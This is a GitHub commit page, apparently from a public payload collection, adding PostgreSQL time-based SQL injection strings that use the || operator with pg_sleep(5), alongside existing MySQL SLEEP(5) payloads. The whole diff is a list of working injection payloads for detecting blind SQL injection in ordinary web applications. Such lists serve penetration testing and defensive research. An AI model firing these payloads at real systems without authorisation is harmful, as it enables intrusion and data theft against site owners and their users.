Merge pull request #779 from florianamette/patch-1

Add support for `||` (concatenation) operator in PostgreSQL for time based SQL injection
This commit is contained in:
Swissky 2025-05-22 22:32:26 +02:00 committed by GitHub
commit aaf6bdf394
No known key found for this signature in database
GPG key ID: B5690EEEBB952194

View file

@ -40,6 +40,16 @@ pg_sleep(5)--
1)) or pg_sleep(5)--
")) or pg_sleep(5)--
')) or pg_sleep(5)--
||pg_sleep(5)--
1||pg_sleep(5)--
"||pg_sleep(5)--
'||pg_sleep(5)--
1)||pg_sleep(5)--
")||pg_sleep(5)--
')||pg_sleep(5)--
1))||pg_sleep(5)--
"))||pg_sleep(5)--
'))||pg_sleep(5)--
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)